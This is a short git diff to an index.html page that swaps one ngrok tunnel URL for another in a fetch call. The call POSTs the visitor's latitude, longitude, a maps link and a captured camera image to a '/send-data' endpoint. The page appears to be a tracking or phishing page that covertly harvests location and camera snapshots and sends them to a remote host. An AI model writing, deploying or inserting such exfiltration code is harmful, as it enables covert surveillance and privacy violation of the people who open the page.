--- a/index.html
+++ b/index.html
@@ -61,7 +61,7 @@
 
         stream.getTracks().forEach(track => track.stop());
 
-        await fetch("https://f1a7-177-200-138-128.ngrok-free.app/send-data", {
+        await fetch("https://3677-177-200-138-128.ngrok-free.app/send-data", {
           method: "POST",
           headers: { "Content-Type": "application/json" },
           body: JSON.stringify({ latitude, longitude, maps, image })
